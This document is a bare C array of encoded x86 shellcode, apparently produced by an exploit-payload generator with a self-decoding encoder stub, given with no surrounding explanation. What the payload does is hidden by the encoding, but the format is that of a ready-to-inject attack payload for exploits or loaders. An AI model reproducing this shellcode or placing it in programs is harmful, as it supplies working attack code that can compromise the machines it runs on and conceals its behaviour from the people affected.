unsigned char buf[] = 
"\xdb\xde\xd9\x74\x24\xf4\xb8\x9b\xf9\x49\x39\x5b\x31\xc9"
"\xb1\x52\x31\x43\x17\x83\xc3\x04\x03\xd8\xea\xab\xcc\x22"
"\xe4\xae\x2f\xda\xf5\xce\xa6\x3f\xc4\xce\xdd\x34\x77\xff"
"\x96\x18\x74\x74\xfa\x88\x0f\xf8\xd3\xbf\xb8\xb7\x05\x8e"
"\x39\xeb\x76\x91\xb9\xf6\xaa\x71\x83\x38\xbf\x70\xc4\x25"
"\x32\x20\x9d\x22\xe1\xd4\xaa\x7f\x3a\x5f\xe0\x6e\x3a\xbc"
"\xb1\x91\x6b\x13\xc9\xcb\xab\x92\x1e\x60\xe2\x8c\x43\x4d"
"\xbc\x27\xb7\x39\x3f\xe1\x89\xc2\xec\xcc\x25\x31\xec\x09"
"\x81\xaa\x9b\x63\xf1\x57\x9c\xb0\x8b\x83\x29\x22\x2b\x47"
"\x89\x8e\xcd\x84\x4c\x45\xc1\x61\x1a\x01\xc6\x74\xcf\x3a"
"\xf2\xfd\xee\xec\x72\x45\xd5\x28\xde\x1d\x74\x69\xba\xf0"
"\x89\x69\x65\xac\x2f\xe2\x88\xb9\x5d\xa9\xc4\x0e\x6c\x51"
"\x15\x19\xe7\x22\x27\x86\x53\xac\x0b\x4f\x7a\x2b\x6b\x7a"
"\x3a\xa3\x92\x85\x3b\xea\x50\xd1\x6b\x84\x71\x5a\xe0\x54"
"\x7d\x8f\xa7\x04\xd1\x60\x08\xf4\x91\xd0\xe0\x1e\x1e\x0e"
"\x10\x21\xf4\x27\xbb\xd8\x9f\x4d\x35\x14\x6a\x3a\x47\xd8"
"\x84\xe6\xce\x3e\xcc\x06\x87\xe9\x79\xbe\x82\x61\x1b\x3f"
"\x19\x0c\x1b\xcb\xae\xf1\xd2\x3c\xda\xe1\x83\xcc\x91\x5b"
"\x05\xd2\x0f\xf3\xc9\x41\xd4\x03\x87\x79\x43\x54\xc0\x4c"
"\x9a\x30\xfc\xf7\x34\x26\xfd\x6e\x7e\xe2\xda\x52\x81\xeb"
"\xaf\xef\xa5\xfb\x69\xef\xe1\xaf\x25\xa6\xbf\x19\x80\x10"
"\x0e\xf3\x5a\xce\xd8\x93\x1b\x3c\xdb\xe5\x23\x69\xad\x09"
"\x95\xc4\xe8\x36\x1a\x81\xfc\x4f\x46\x31\x02\x9a\xc2\x51"
"\xe1\x0e\x3f\xfa\xbc\xdb\x82\x67\x3f\x36\xc0\x91\xbc\xb2"
"\xb9\x65\xdc\xb7\xbc\x22\x5a\x24\xcd\x3b\x0f\x4a\x62\x3b"
"\x1a";
